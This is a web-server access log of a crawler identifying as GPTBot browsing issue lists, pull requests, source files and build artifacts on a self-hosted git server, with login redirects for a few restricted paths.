192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:42:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9952] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:17:42:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9950] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=all&type=all" -[17/Feb/2026:17:42:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10079] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:42:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=all&type=all" -[17/Feb/2026:17:42:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:42:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=oldest&state=all&type=all" -[17/Feb/2026:17:42:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=all&type=all" -[17/Feb/2026:17:42:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastupdate&state=all&type=all" -[17/Feb/2026:17:42:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.log?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.log" -[17/Feb/2026:17:42:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10151] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&sort=oldest&state=all&type=all" -[17/Feb/2026:17:42:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build_exe.bat?display=rendered" [Client 74.7.227.38] [Length 11124] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build_exe.bat" -[17/Feb/2026:17:42:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/Dockerfile" -[17/Feb/2026:17:42:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fdata_fetcher%2f__pycache__" [Client 74.7.227.38] [Length 21822] [Gzip 4.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__" -[17/Feb/2026:17:42:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:42:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html?display=source" [Client 74.7.227.38] [Length 22743] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html" -[17/Feb/2026:17:42:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:42:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastcomment&state=all&type=all" -[17/Feb/2026:17:42:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=recentupdate&state=all&type=all" -[17/Feb/2026:17:42:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9941] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=all&type=all" -[17/Feb/2026:17:42:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=all&type=all" -[17/Feb/2026:17:42:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastcomment&state=all&type=all" -[17/Feb/2026:17:42:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10158] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=all&type=all" -[17/Feb/2026:17:42:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9945] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&state=all&type=all" -[17/Feb/2026:17:42:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9942] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:17:42:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:42:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=recentupdate&state=all&type=all" -[17/Feb/2026:17:42:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=all&type=all" -[17/Feb/2026:17:42:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&sort=nearduedate&state=all&type=all" -[17/Feb/2026:17:42:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=all&type=all" -[17/Feb/2026:17:42:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastupdate&state=all&type=all" -[17/Feb/2026:17:42:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=all&type=all" -[17/Feb/2026:17:42:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastcomment&state=all&type=all" -[17/Feb/2026:17:42:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9944] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&state=all&type=all" -[17/Feb/2026:17:42:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9968] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=all&type=all" -[17/Feb/2026:17:42:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=mostcomment&state=all&type=all" -[17/Feb/2026:17:42:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=all&type=all" -[17/Feb/2026:17:42:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=all&type=all" -[17/Feb/2026:17:42:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&state=all&type=all" -[17/Feb/2026:17:42:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=all&type=all" -[17/Feb/2026:17:42:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastcomment&state=all&type=all" -[17/Feb/2026:17:42:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/.vscode" [Client 74.7.227.38] [Length 10371] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project" -[17/Feb/2026:17:42:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12033] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:42:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12033] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:42:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:17:42:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10086] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:42:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2f3.31.10" [Client 74.7.227.38] [Length 94698] [Gzip 15.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:17:42:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:17:42:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:17:42:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 11322] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:17:42:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:17:42:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:17:42:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/.vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/.vscode" -[17/Feb/2026:17:42:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/.vscode" -[17/Feb/2026:17:42:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/.vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/.vscode" -[17/Feb/2026:17:42:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/.vscode" -[17/Feb/2026:17:42:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/.vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/.vscode" -[17/Feb/2026:17:42:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/.vscode" -[17/Feb/2026:17:42:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11766] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/.vscode" -[17/Feb/2026:17:42:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/.vscode" [Client 74.7.227.38] [Length 9814] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 